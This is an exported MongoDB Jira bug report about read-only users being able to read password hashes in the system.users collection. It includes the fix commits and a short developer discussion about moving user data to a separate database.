[SERVER-4692] Read-only users should be denied access to system.users collection Created: 16/Jan/12  Updated: 30/Oct/15  Resolved: 09/Mar/12

Status: Closed
Project: Core Server
Component/s: Security
Affects Version/s: 2.0.2
Fix Version/s: 2.1.1

Type: Bug Priority: Critical - P2
Reporter: Nathaniel McCallum Assignee: Mathias Stearn
Resolution: Done Votes: 0
Labels: security
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified

Issue Links:
Related
related to SERVER-6031 read only user can get write priority Closed
is related to SERVER-7604 On MongoS read-only users should be d... Closed
is related to SERVER-9009 mongodump fails when run by a read-on... Closed
is related to TOOLS-134 Mongodump and mongoexport should skip... Closed
Backwards Compatibility: Minor Change
Operating System: ALL
Participants:

 Description   

Original Title: system.users collection placement allows offline dictionary attack for read-only users

When using authentication with mongodb, users with read-write permissions have their password hashes stored in system.users. Read-only users can read these hashes. This permits read-only users to read the password hashes of read/write users and perform an offline dictionary attack in order to escalate their privileges.



 Comments   
Comment by auto [ 09/Mar/12 ]

Author:

{u'login': u'RedBeard0531', u'name': u'Mathias Stearn', u'email': u'redbeard0531@gmail.com'}

Message: Don't allow read-only users to read from system.users collection SERVER-4692
Branch: master
https://github.com/mongodb/mongo/commit/1afdf32715eeaac5c287b25db7ea016ceaa44380

Comment by auto [ 09/Mar/12 ]

Author:

{u'login': u'RedBeard0531', u'name': u'Mathias Stearn', u'email': u'redbeard0531@gmail.com'}

Message: fix broken bits in reenabled test

Prep for SERVER-4692
Uncovered SERVER-5228
Branch: master
https://github.com/mongodb/mongo/commit/d06ef3bd8e857fbe20d671a366f1696d8c3b2a27

Comment by auto [ 09/Mar/12 ]

Author:

{u'login': u'RedBeard0531', u'name': u'Mathias Stearn', u'email': u'redbeard0531@gmail.com'}

Message: Features cmd no longer has readlock field

Prep for SERVER-4692
readlock field removed in commit 35031d43d717dda19b0b62ab6f97af275717ad30
Branch: master
https://github.com/mongodb/mongo/commit/5cf72997e3bb116d90f7d9969c6f6b4028a5f8f0

Comment by Eliot Horowitz (Inactive) [ 17/Jan/12 ]

The admin database is for people with server level admin access.

Comment by Nathaniel McCallum [ 17/Jan/12 ]

If you don't move it, how do you plan on restricting/granting permission to create new databases?

Comment by Eliot Horowitz (Inactive) [ 17/Jan/12 ]

system.indexes will certainly not change.

system.users will probably not move - but we are likely to add an "admin" role which would have access to system.users

Comment by Nathaniel McCallum [ 17/Jan/12 ]

While blocking read-only users from reading system.users does solve this security problem, it doesn't solve the case where read/write users can keep backups of passwords for offline dictionary attacks when their privileged are revoked. This is, I think, just as important.

It would be best to move system.users (and system.indexes while we're at it) to a separate database. This entirely separates the admin concern for the data storage and retrieval concern.

Comment by Eliot Horowitz (Inactive) [ 17/Jan/12 ]

read only users shouldn't be able to access system.users

Generated at Thu Feb 08 03:06:42 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.